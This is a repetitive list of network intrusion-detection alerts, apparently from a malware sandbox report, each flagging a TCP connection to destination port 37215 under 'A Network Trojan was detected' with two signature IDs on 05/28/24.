          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402598
          SID:2835222
          Source Port:42580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123907
          SID:2835222
          Source Port:54076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781241
          SID:2829579
          Source Port:40860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291594
          SID:2835222
          Source Port:46090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178367
          SID:2835222
          Source Port:54608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.985484
          SID:2835222
          Source Port:42166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.279694
          SID:2835222
          Source Port:33936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852026
          SID:2835222
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725157
          SID:2829579
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927796
          SID:2835222
          Source Port:53472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994913
          SID:2835222
          Source Port:60110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175816
          SID:2829579
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497173
          SID:2829579
          Source Port:51630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124587
          SID:2835222
          Source Port:50568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435479
          SID:2835222
          Source Port:53858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482616
          SID:2835222
          Source Port:55898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114583
          SID:2835222
          Source Port:52516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321142
          SID:2829579
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668229
          SID:2835222
          Source Port:37192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529137
          SID:2829579
          Source Port:60586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669518
          SID:2829579
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774530
          SID:2829579
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.245230
          SID:2829579
          Source Port:59946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142613
          SID:2835222
          Source Port:57648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922009
          SID:2835222
          Source Port:60972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178888
          SID:2829579
          Source Port:45948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678340
          SID:2835222
          Source Port:59092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206935
          SID:2835222
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084866
          SID:2835222
          Source Port:50996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230340
          SID:2835222
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663064
          SID:2829579
          Source Port:43584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059679
          SID:2835222
          Source Port:59702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270354
          SID:2835222
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744691
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157424
          SID:2829579
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225996
          SID:2835222
          Source Port:36750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045322
          SID:2835222
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982907
          SID:2829579
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168454
          SID:2835222
          Source Port:40662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849243
          SID:2835222
          Source Port:37432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671904
          SID:2829579
          Source Port:34272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339937
          SID:2835222
          Source Port:39034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338569
          SID:2835222
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990678
          SID:2835222
          Source Port:51154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473753
          SID:2829579
          Source Port:57640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475745
          SID:2829579
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846285
          SID:2829579
          Source Port:38904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592881
          SID:2829579
          Source Port:42516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850940
          SID:2835222
          Source Port:44404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084367
          SID:2829579
          Source Port:39534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464198
          SID:2829579
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041370
          SID:2829579
          Source Port:42182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.220652
          SID:2829579
          Source Port:43432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630045
          SID:2835222
          Source Port:34422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088020
          SID:2835222
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170704
          SID:2835222
          Source Port:59748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946816
          SID:2829579
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466074
          SID:2835222
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221587
          SID:2835222
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210521
          SID:2829579
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511927
          SID:2835222
          Source Port:52530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529934
          SID:2829579
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186124
          SID:2829579
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922980
          SID:2829579
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975428
          SID:2835222
          Source Port:50020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528248
          SID:2835222
          Source Port:39508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102968
          SID:2829579
          Source Port:56764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186012
          SID:2835222
          Source Port:43072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849289
          SID:2829579
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228241
          SID:2835222
          Source Port:33944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438834
          SID:2835222
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529024
          SID:2835222
          Source Port:43244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873500
          SID:2829579
          Source Port:47338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780833
          SID:2829579
          Source Port:52684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894009
          SID:2829579
          Source Port:51852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812771
          SID:2829579
          Source Port:34590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742237
          SID:2835222
          Source Port:42928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299188
          SID:2835222
          Source Port:49054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.040762
          SID:2829579
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355703
          SID:2835222
          Source Port:58622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482806
          SID:2829579
          Source Port:47582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977383
          SID:2835222
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299406
          SID:2829579
          Source Port:39814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630777
          SID:2829579
          Source Port:46018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657083
          SID:2835222
          Source Port:44716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.481755
          SID:2829579
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678572
          SID:2835222
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269237
          SID:2829579
          Source Port:56096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695732
          SID:2835222
          Source Port:47782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669278
          SID:2829579
          Source Port:48472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328134
          SID:2829579
          Source Port:47184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240198
          SID:2835222
          Source Port:43128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269152
          SID:2835222
          Source Port:34268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022355
          SID:2829579
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217132
          SID:2829579
          Source Port:33126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465213
          SID:2829579
          Source Port:36036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838320
          SID:2829579
          Source Port:56804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855959
          SID:2835222
          Source Port:50790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319148
          SID:2829579
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793902
          SID:2835222
          Source Port:45976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095568
          SID:2835222
          Source Port:34602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805539
          SID:2835222
          Source Port:59264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048664
          SID:2835222
          Source Port:41356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083502
          SID:2835222
          Source Port:47746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301150
          SID:2835222
          Source Port:44532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143456
          SID:2829579
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711127
          SID:2829579
          Source Port:56536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794375
          SID:2829579
          Source Port:47684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840055
          SID:2829579
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161738
          SID:2835222
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214278
          SID:2829579
          Source Port:41930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215028
          SID:2835222
          Source Port:43340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549416
          SID:2829579
          Source Port:58414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465154
          SID:2835222
          Source Port:49166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473584
          SID:2835222
          Source Port:45742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.428395
          SID:2829579
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592236
          SID:2829579
          Source Port:42388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472309
          SID:2829579
          Source Port:40472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893932
          SID:2835222
          Source Port:57056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190702
          SID:2835222
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291732
          SID:2829579
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970148
          SID:2835222
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156300
          SID:2829579
          Source Port:46302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163661
          SID:2829579
          Source Port:42080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953514
          SID:2829579
          Source Port:43662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512618
          SID:2829579
          Source Port:43140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439031
          SID:2835222
          Source Port:44274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497196
          SID:2835222
          Source Port:54754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224309
          SID:2835222
          Source Port:33598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272431
          SID:2835222
          Source Port:48340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214818
          SID:2835222
          Source Port:53384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271389
          SID:2835222
          Source Port:45792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527191
          SID:2829579
          Source Port:51176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946659
          SID:2829579
          Source Port:49176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485657
          SID:2835222
          Source Port:39790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066556
          SID:2829579
          Source Port:39342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176635
          SID:2829579
          Source Port:40464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849159
          SID:2835222
          Source Port:41178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549242
          SID:2829579
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174574
          SID:2835222
          Source Port:55692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742394
          SID:2835222
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797372
          SID:2835222
          Source Port:48410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.345798
          SID:2829579
          Source Port:60600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848520
          SID:2835222
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976432
          SID:2829579
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147335
          SID:2829579
          Source Port:59086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597437
          SID:2829579
          Source Port:58284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300029
          SID:2835222
          Source Port:45990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295056
          SID:2829579
          Source Port:58564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486750
          SID:2829579
          Source Port:48388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075170
          SID:2829579
          Source Port:54744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288308
          SID:2829579
          Source Port:41350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220549
          SID:2829579
          Source Port:58576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735452
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242876
          SID:2829579
          Source Port:58012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341382
          SID:2835222
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663235
          SID:2835222
          Source Port:41292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268236
          SID:2829579
          Source Port:44696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839717
          SID:2835222
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270264
          SID:2835222
          Source Port:34896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301271
          SID:2829579
          Source Port:44460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202742
          SID:2829579
          Source Port:52130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891910
          SID:2835222
          Source Port:38776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.675403
          SID:2835222
          Source Port:46220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480733
          SID:2829579
          Source Port:49574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081471
          SID:2829579
          Source Port:42712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.555017
          SID:2829579
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710753
          SID:2835222
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717992
          SID:2829579
          Source Port:51914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486688
          SID:2835222
          Source Port:42350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543520
          SID:2835222
          Source Port:52788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.421933
          SID:2829579
          Source Port:40044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195326
          SID:2829579
          Source Port:39442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847014
          SID:2835222
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465394
          SID:2835222
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738331
          SID:2835222
          Source Port:33650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732821
          SID:2835222
          Source Port:43052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.330083
          SID:2835222
          Source Port:52712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102368
          SID:2835222
          Source Port:38888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475400
          SID:2829579
          Source Port:55232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513458
          SID:2829579
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944196
          SID:2835222
          Source Port:58790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600588
          SID:2829579
          Source Port:54436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114137
          SID:2829579
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842507
          SID:2835222
          Source Port:58952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724567
          SID:2835222
          Source Port:44078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.326363
          SID:2835222
          Source Port:46790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953063
          SID:2835222
          Source Port:57008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863292
          SID:2835222
          Source Port:60458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709090
          SID:2829579
          Source Port:34576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665417
          SID:2835222
          Source Port:52008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084697
          SID:2829579
          Source Port:41088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592174
          SID:2835222
          Source Port:39418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603046
          SID:2829579
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685991
          SID:2835222
          Source Port:43816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361477
          SID:2835222
          Source Port:51460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926627
          SID:2835222
          Source Port:38974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
